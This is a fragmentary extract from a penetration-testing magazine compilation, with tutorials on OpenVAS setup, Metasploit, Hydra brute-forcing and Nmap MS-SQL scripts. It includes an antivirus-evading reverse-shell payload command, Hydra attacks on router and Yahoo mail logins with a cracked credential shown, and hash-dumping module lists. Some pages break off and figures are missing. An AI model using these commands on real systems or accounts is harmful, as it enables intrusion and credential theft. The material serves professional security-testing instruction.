There are a few open source free vulnerability scanners out there, among them are OpenVAS which can be
found at http://www.openvas.org/. OpenVAS currently has over 30,000 checks, so you get what you pay
for. Another reason we are talking about OpenVAS is because it comes installed on BackTrack. But it does
require a few steps in order to get it up and running.
So lets get OpenVAS setup and configured, some of these commands will require user input for instance the
setup of the SSL certificate (but you can just hit enter on all the prompts), and when creating the Amin user
you will be asked to input a password (Listing 2).
Listing 2. OpenVAS
cd /pentest/misc/openvas
openvas-mkcert
openvas-mkcert-client -n om -i
openvasad -c add_user -n admin -r Admin
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
THE BEST OF
Once you login you will see the main page which looks like this (Figure 13).
42
THE BEST OF
Metasploit
The Metasploit Project was created by HD Moore and is a project which provides information about security
vulnerabilities and aids penetration testing, its best-known for its open-source Metasploit Framework which is
a tool for developing and executing exploit code. When your Nmap scan has completed, lets go ahead and load
the data into Metasploit. We will first launch Metasploit, then create and connect to a new workspace to work
with, load the Nmap scan results and verify things completed with the hosts command (Listing 3 and Figure 19).
43
THE BEST OF
Listing 3. Hosts command
msfconsole
workspace -a my_network
workspace my_network
db_import /root/my_subnet.xml
hosts
If at any time you need help in Metasploit you can issue the help command, also each command usually will
take the -h option, for example, hosts -h.
A shortcut to running Nessus from the command line, is to actually run it from within Metasploit itself;
however, I like to run Nessus from the command line with the -oA switch which will Output in the three
major formats at once. This can be incredibly useful if you need to grep through the Nmap output or
otherwise sort through the output and use that information with other tools. You can, however, issue all the
same commands from within Metasploit at the command prompt you simply type db_nmap instead of nmap
from the command line, which we just finished.
Metasploit has a LOT of different auxiliary modules and tons of commands, but for this article we obviously
cant cover them all. We will however hit on some of the major commands and give you an understanding
of how to use the tool and some of the most common things you will be doing inside the Metesploit console.
With that in mind lets take a look at what services were found with Nmap that we have imported.
services
As you can see, Nmap did a really good job of identifying the open ports and what services and versions are
running on those ports (Figure 20).
44
THE BEST OF
Lets take a look at the open services on just one of these hosts, for example, we will use 192.168.1.197
(Figure 21).
services 192.168.1.197
45
THE BEST OF
You should have been returned a list that looks something like this, with the module that we were looking for
listed (Figure 25).
Let me take a minute here and explain the difference between an exploit like this MS08 one, and the
auxiliary module we loaded and used earlier. Once you have all your required fields set you will execute an
auxiliary module with the run command. An Exploit will use the command exploit. But this isnt the only
difference, the main difference between an exploit and auxiliary module is that an exploit needs a payload
in order to do anything, and there werewhatlike 300 payloads available? Each exploit is matched to the
payloads it will work with, not all payloads will work with all exploits. So you will have to identify which
payload you want to use that will work with the particular exploit you are going to use. Once you have
loaded an exploit module you can see which payloads are available to that module with the show payloads
command. Now lets continue....
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
show options
Ah, now you can see that not only are there required fields for the MS08 module, but that there are also
required fields for the Payload (Figure 26).
46
THE BEST OF
47
THE BEST OF
48
THE BEST OF
Brute-forcing
Brute-forcing is a technique that repeatedly tries different combinations of usernames and password to try
and log into a service or break an encrypted password. There are two basic types of attacks dictionary and
rainbow tables.
Dictionary Attacks can be made using dictionary files or lists of passwords, but brute-force attacks also run
through all combinations of character setssay 0-9, A-Z, a-z and special characters. If you know the length
and password policy that a company uses it will greatly cut down on the time it uses to crack a password.
For dictionary files, I would suggest searching the Internet. A good starting point would be Skull Security at
http://www.skullsecurity.org/wiki/index.php/Passwords.
Rainbow table attacks are basically huge files with different character sets that have already been hashed
using all combinations of the set, and will usually crack a password long before a pure brute-force attempt
using dictionary or non-computed hash attempts. If youre interested in rainbow tables, I strongly recommend
checking out Free Rainbow Tables where you can download tables which have already been created with many
different character sets available. You can find them at https://www.freerainbowtables.com/.
One final note on passwords you may decrypt or find users often reuse passwords. Once you find a
password I always add it to my dictionary file. That way as you continue your test you can use those
passwords against other hosts and services.
Network Infrastructure
Another item an internal penetration test should cover is the network infrastructure. There are many different
ways to go about testing the infrastructure including modules inside of Mestasploit. All it takes is one older
or misconfigured Cisco device on the network and you can literally have access to ever Cisco device on
the network. From there you can do things like turn on and off ports, add your host to a restricted list, and
change and monitor span ports.
Cisc0wn
Daniel Compton over at Common exploits has created a nice script called Cisc0wn that will make your life
easier. He describes Cisc0wn this way:
Cisc0wn is simply a bash script that pulls various tools and enumeration into one simple command for
ease, so is not really a tool in itself. It doesnt do anything extra than you cant really already do, it just
saves running several different tools and commands and entering the same info over and over. It uses
Metasploit modules and snmpwalk for most of the tasks.
Cisc0wn can be found at http://www.commonexploits.com/?p=503 along with a nice walk-through of how to
use it. I strongly suggest you check it out when you have the time.
VoIP Networks
Many corporations now run VoIP for their phone networks. If its in scope or you come across a subnet that
has a lot of VoIP devices, dont forget to include these in your tests. Among other things an attacker may be
able to break into is a users voicemail and listen to messages, or perform a man-in-the-middle attack and
actively record users phone calls.
SIPVicious
SIPVicious is simply defined as ... a set of tools that can be used to audit SIP based VoIP systems. It
currently consists of four tools: And its basically that, a tool for auditing SIP based VoIP systems and can
49
THE BEST OF
be found at http://code.google.com/p/sipvicious/. If you have never heard of SIPVicious and are unfamiliar
with it, I would also recommend checking out http://blog.sipvicious.org/.
Databases
Databases can be a particularly interesting subject and could very well be an entirely separate article.
Companies store all sorts of information in databases. In some cases everything is open game, but I have had
certain tests where the company stores personally identifiable information or PII, and have said go ahead
and try and exploit the databases. BUT they wanted me to stop at the table level, and not actually look at the
contents. This is very important STOP where the client tells you to, remember you document, you are only
allowed to test what they want you to, and only as deep as they would like.
BackTrack has quite a few tools built in for Databases, you can access these by going to the Applications>
BackTrack> Vulnerability Assessment> Database Assessment.
Metasploit also has a lot of function built around databases, I suggest you start by looking at the auxiliary
modules first.
auxiliary/scanner/mssql/mssql_hashdump
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mssql/mssql_ping
auxiliary/scanner/mssql/mssql_schemadump
auxiliary/scanner/oracle/oracle_hashdump
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/oracle/sid_brute
auxiliary/scanner/oracle/sid_enum
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version
Camera systems: https://community.rapid7.com/community/metasploit/blog/2012/01/23/video-conferencingand-self-selecting-targets.
Protocal Analysis
At some point you may find yourself needing to look at whats going on, on the network, or need to do some
packet analysis. Were not going to talk about that here, but it is something to be aware of.
50
THE BEST OF
Wireshark
Wireshark is the worlds foremost network protocol analyzer. It lets you see whats happening on your
network at a microscopic level. It is the de facto (and often de jure) standard across many industries and
educational institutions. and can be found at www.wireshark.org. Again this is something else for you to
play with. Fire it up on your test or home network, and I think youll be surprised at what you see.
Default Passwords
Default installs and configurations are often left with the default username and password. If you come across
a login page to say a router, web application, camera system, etc. Its always worth Googling for the specific
device or software (and sometimes version) + default password, as you will be surprised as to how often
someone sets up a device or installs some new software, configures it, then just leaves the default login.
Additionally, if you are having a hard time finding the default go ahead and look for the setup or installation
guide since they will let you know whether or not there is a default password. Manufacturers are becoming
more security aware and do not have defaults anymore and instead require the user to input their own
password during initial setup.
Evading Anti-virus
Undoubtedly you will find some machine that you should be able to exploit, but try as you may, you just cant
get it to work! Most likely the culprit will be some type of anti-virus. There are things you can do to get around
AV but again, thats well beyond the scope of this article. With that said, a safe place to start is the Metasploit
Framework, included is a tool called msfpayload and msfencode which allows you to encode your payload with
quite a few different options. You may have to try and try again utilizing different options before you will be
actually get your payload to bypass the AV. The basic format of the command will look like this:
msfpayload windows/meterpreter/reverse_tcp LHOST=
192.168.1.115 R | ./msfencode -t exe -x calc.exe -k -o
exploit.exe -e x86/shikata_ga_nai -c 5
Reporting
Remember we said earlier that the whole point of penetration testing, is not only to find the holes before an
attacker would, but also to deliver a report to your client with actionable items. I create all of my reports by hand.
What I do is show the workflow that I followed during the test and include pictures where needed.
Remember that this report may go through quite a few hands and you may want to show step-by-step how
you exploited a specific device, since there may be a technical person who would want to recreate the steps,
or test them again after the vulnerability has been remediated. Another thing I show is the number of overall
vulnerabilities that I was able to identify during a test. If you have a client who performs yearly testing they
may use these numbers as metrics at some point to show that, for example, last year they had 500 critical and
high severity issues, but this year they only have 75.
I always make recommendations based on my test. For instance, I may see that a client is still using Telnet
or FTP, which pass everything (including user credentials) unencrypted and in the clear, and if someone is
sniffing the traffic (remember Wireshark?) they can easily harvest the credentials of any user logging into
those systems.
Since I use Nessus and Core Impact, one final thing I include is my scan data in the form of a report.
There may be some system on the network with a vulnerability that I did not get around to exploiting,
or there may be no publicly available exploits. This doesnt mean that there wont be some released in
the future and I always recommend that these issues be remediated. The great part about a lot of these
reports is that they include links to the original vulnerability along with the fix, and that translates to less
questions that I have to answer or follow up on!
51
THE BEST OF
Conclusion
Hopefully you have found this article informative and now have a better idea of where to start when
performing penetration tests. Since this was an article for a magazine realizing there is a limited amount
of space, there may have been some things that I couldnt cover in as much depth as I would have liked.
But Google is your friend, and the information is out there. One thing that I touched on, but did not go into
details on is the testing of web applications. That subject alone would have more than tripled the size of this
article. If you are interested in the penetration testing of web applications I would suggest taking a look at
w3af and Burp Suite which can be found at http://w3af.org/ and http://portswigger.net/burp/.
One final note; you will want to be aware of compliance. Many of your clients will be having a penetration
test done in order to be in compliance with requirements such as like PCI-DSS, for an audit, or meet some
other regulatory or industry standard. If you are engaged for such a test, make sure you know that your
methodology and test plan will meet their compliance needs as many of them require particular items be
tested in a specific way.
Nick Hensley having held his CISSP since 2002 is a seasoned Information Security Professional with
12 years of industry experience. He currently manages a team of penetration testers; and performs
penetration and application security testing along side his team, supporting roughly 150 different clients.
His background covers a broad range of managerial and technical positions. Nicks expertise lies in
Penetration Testing, Computer Forensics, Electronic Discovery, Intrusion Detection and Prevention
Systems, and Security Architecture Design and Implementation. He can be reached via email at
NickHensleyCISSP@gmail.com.
advertisement
THE BEST OF
53
THE BEST OF
Change any default passwords.
Make intentional typos that only you know.
Do not use the same password for all your systems.
Change your password frequently.
So, now you know the rules. But how do you ensure that your passwords are strong enough and not too
complicated to remember? How can you evaluate the strength of your password? You can use tools, in
Backtrack to test your password resilience.
THE BEST OF
see the bar slowing at 99%.. Do not abort and you will eventually see the following message: Figure 3.
55
THE BEST OF
56
THE BEST OF
The command string to be used to attack the router along with its arguments is as follow:
hydra -V -l admin -P /root/Desktop/dictionary.txt
-t 36 -f -s 80 192.168.1.1 http-get /
So we are essentially telling Hydra to use the username (which in this scenario will only be admin) and password
combination used every time (-V), with username admin (as in most router cases but if we want, another dictionary
can be used here for usernames), specifying the password file to be used (-P), we specify number of connections
in parallel tasks (-t), exiting after first successful crack (-f), port to be used is 80 (http port which is open as nmap
showed earlier), IP address of the router is 192.168.1.1 and protocol is http-get (usually it is either get or post).
Notice the character / at the end of the line which specifies to attempt to crack at the root page (it is actually like
saying try the login credentials at index.html). The output we get is shown in Figure 6.
Figure 6. The output of the attempt to crack the password of the router at 192.168.1.1
From what you can see, the password search wasnt really successful so the program just concludes its
execution. As already stated earlier, try to have one basic principle at mind: The better variety and size the
original dictionary has, the better the result will be. Let us try a different approach this time by attacking the
routers ftp protocol, using the command string that follows. This time, we tell Hydra to try a null password and
to use login credentials as password in addition to what we did earlier.
hydra -V -l admin -P /root/Desktop/dictionary.txt
-e ns -f -s 21 192.168.1.1 ftp
If you are not a command line addict, you can use the GUI version of Hydra. For instance, checking on the
parameters will represent the same settings as the above command line: Figure 7 and Figure 8.
57
THE BEST OF
So to verify that this is indeed true, I will ftp to 192.168.1.1 using admin as username and enti4752 as password.
THE BEST OF
Lets see one more example of using Hydra but this time to crack yahoo mail accounts (same logic applies to
gmail or hotmail or all other mail servers). We use the following settings:
Simple target: smtp.mail.yahoo.com (Yahoo server)
Protocol: smtp
Port: 465
Enable also: SSL, verbose and show attempts.
The name that we specify as target is the mail account that we are attempting to crack, so in my example I
put my account and I also specified a dictionary for the attack, which is the same one that I have been using
throughout this presentation (Figure 10 and Figure 11).
Figure 10. Hydra Target tab settings for cracking yahoo passwords
Figure 11. Hydra Passwords tab settings for cracking yahoo passwords
59
THE BEST OF
If we choose now to start Hydra you will notice an output as the one in Figure 12. I have shortened the
dictionary to limit the time to execute as well as to shorten the output in order to focus at the result.
Figure 12. Attacking yahoo mail account and revealing the password
While an additional line at the end will state:
[25] [smtp] host: 188.125.69.59 login:
zeroout2003@yahoo.gr password: backtrack
If I use the above credentials I will be able to successfully login to my mail account using the standard web
page at https://login.yahoo.com/.
Summary
The above article clearly shows how easy it is to target system. We have used nmap as a network scanner,
and the supporting protocols and functions of Hydra.
As we already stated through the course of this article, when dealing with dictionary attacks, the tools are as
strong as their internal dictionaries and also the processing power that someone has at his disposal in order to
combine the dictionary attack with proper brute force cracking capability. There are also a lot of other tools
in Backtrack which include online and offline password cracking such as rainbowcrack, John the Ripper,
medusa, ncrack and much more others that are worth dissecting in other articles.
For instance, John the Ripper has the ability to crack password hashes, so if we get the hashed contents of a
password file, the application can discover the initial plain text form through a variety of hashed passwords.
You will be amazed that many people still use default passwords or just simple words as passwords.
Never underestimate how simple-minded users or system administrators can be. I am sure you can remember
the old movie Hackers, the passwords referenced are: love, secret, sex and God. You wouldnt
believe how many people use these words as their passwords.
Nikolaos Mitropoulos has been working for over a year as a network security
engineer for AT&Ts Managed Security Services team. He is Cisco and Juniper
certified (holding CCNA, JNCIA and JNCIS-SEC certifications). In the past four years
he has focused in teaching at various education levels varying from professor of
secondary education level courses to demanding corporate classes for professionals
dealing in multiple aspects of the networking and security fields. His hobbies are
steganography, digital watermarking and building penetration testing skills.
60
THE BEST OF
NMAP
NMAP is a security scanner written by Gordon Lyon and its mainly used to discover Host and services on a
computer network, thus creating a map of the network. NMAP has lots of features that allow you to see
networks such as host discovery, service and operating system detection, etc. One of the coolest features, and
the one we will use today, is the NSE or NMAP Scripting Engine. These scripts can perform more advanced
service detection, vulnerability analysis, and even brute forcing. For now we will focus on just scripts to
61
THE BEST OF
analyze MS-SQL. To see a full list of the scripts that are related to MS-SQL go to your terminal and type this
cd /opt/metasploit/common/share/nmap/scripts (Figure 1). These are the scripts that we have available and they
can be used with multiple arguments to augment their power as we will see later on. The first thing well do
is scan our network for MS-SQL servers (Figure 2).
Figure 3. NMAP finds that our server has not been patched
The next thing is to find if any account has an empty password (Figure 4).
62
THE BEST OF
THE BEST OF
as its password. If you know SQL all you have to do now is login to the server and do whatever you
want. However, instead of doing that, we will continue testing our NMAP scripts. Lets try to find some
configuration information (Figure 6).
Figure 7. NMAP provides us with the table info on our MS-SQL server
Lets look at the last two scripts we will test (Figure 8). Here you can see that you are able to pull the
database name and the username of the creator. This is a good way to see other usernames so you can get a
better idea of how many people access this MS-SQL instance. The last script allows you to pull the hashes
64
THE BEST OF
of the available users. Once you have this you dont need to attack the server directly, you can move on to an
offline attack with tools like John the Ripper and try to crack the hashes to get more credentials.
Figure 8. NMAP script to obtain database owner info and user hashes
We have covered essentially what your possibilities are with NMAP against any MS-SQL server. As you can
see there is a lot of info that can be gathered, especially if you are able to find a valid credential to access the
MS-SQL instance. If you refer back to Figure 3 you will notice that once this MS-SQL Server software was
installed, it never received additional patching. This opens the door to a lot of possible vulnerabilities and its
our cue to move on into Metasploit.
Metasploit
Metasploit is a framework that provides the infrastructure needed to automate multiple tasks needed in order
to assess and/or exploit vulnerabilities found in a host. It provides multiple tools that allow you to scan almost
any host and check for security holes that later can be exploited by using one or many of its catalogs of exploits.
Still, beware, this is not a magical point and click tool. Just because you may find misconfigured things via their
scanner modules doesnt mean that there is an exploit guaranteed to work. Sometimes you need to modify the
actual exploit code and sometimes they just wont work.
Metasploit was developed by HD Moore to be able to have a flexible and maintainable framework for the
creation and development of exploits that will save him time from having to validate and sanitize public
exploit code. His first iteration had 11 exploits. Now you can find well over a thousand exploits as well as
auxiliary modules and NOPS. Today, Metasploit is a necessary tool for penetration testing and exploitation.
To get Metasploit running you can follow the path stated on the next figure (Figure 9).
65
THE BEST OF
66
THE BEST OF
67
THE BEST OF
THE BEST OF
We are using a bind type of payload, if there are firewall rules that block outside hosts connection attempts
going into other machines than those established by the rules, this wont work; so you may want to try using a
reverse type of connection so the victim connects to you. If the firewall also filters connection attempts from
internal PCs to unknown hosts then you are out of luck. Now we are all setup so we verify our options once
again and type exploit to start the exploitation attempt. (Figure 16).
THE BEST OF
Now you can type help to explore all options. As an example we can type the command shell and explore
(Figure 19).
70
THE BEST OF
echo 2 - Continue Previous Project
echo 3 - Exit Script
echo
read -p >>> option
echo
# OPTION 1 - Create a new folder for a new project engagement...
if [ $option = 1 ]; then
read -p New Project Folder: folder
mkdir $folder
cd /root/$folder
echo
d=$(date +%Y_%m_%d_%H_%M)
echo Your log: $d
echo
echo Loading msfconsole... Please Wait...
set TimestampOutput true > /root/$folder/autolog.rc
echo spool /root/$folder/$d.txt >> /root/$folder/autolog.rc
msfconsole -r autolog.rc
fi
71
THE BEST OF
Okay, so once you get you script operational, lets see what it does: Fgure 20-22.
72
THE BEST OF
Figure 22. Metasploit loaded Notice the last lines where it tells you that your log information is being
saved on the folder you just created. Once you get here you are ready to work
If we run an NMAP scan from within Metasploit, you can save it to your log. Lets see (Figure 23).
THE BEST OF
74
THE BEST OF
Conclusion
We have explored the possibilities that NMAP has to offer to scan and analyze MS-SQL servers.
The scripting engine is a powerful tool that can help you explore lots of different things. Go ahead and experiment
with the additional possibilities. To do this, set up different services or apps like IIS, web sites, Oracle etc. and scan
those using the scripts provided to work with them. Also we were able to see the possibilities that Metasploit has
to offer and leave you with the task of comparing them to NMAP to see which works better and why. Finally, the
bonus script will help you collect the info and save it for reporting so your homework now is to repeat this tutorial
but creating the folder and log first. Also take notice of how NMAP behaves inside Metasploit. Enjoy!
Jose Ruiz is an independent consultant specializing in the areas of physical and logical
network security with tasks ranging from policy audit, vulnerability assessment,
mitigation plan implementation, business continuity and others. He holds a Masters
Degree in Information Systems with a specialty on electronic fraud investigation. He
works investigating various cases ranging from corporate misuse of resources,
phishing and wireless intrusion. Jose is also an IT instructor and Microsoft Certified
Trainer teaching courses for both Microsoft and CompTIA certifications and a college
professor at undergraduate and graduate level teaching forensics, networking, wireless
and ethical hacking courses at both EDP University and Interamerican University in
Puerto Rico. Jose is also an active contributor to the ISECOM Hackers High School
project. He holds a Masters Degree in Information Systems with a specialty on electronic fraud
investigation and multiple certifications including A+, Network+, Server+, Security+, MCSA 2000 /
2003 / 2008, MCITP, MCT, OSWP, CIW and others.
75
2014
ISSE
In partnership with
@ISSEConference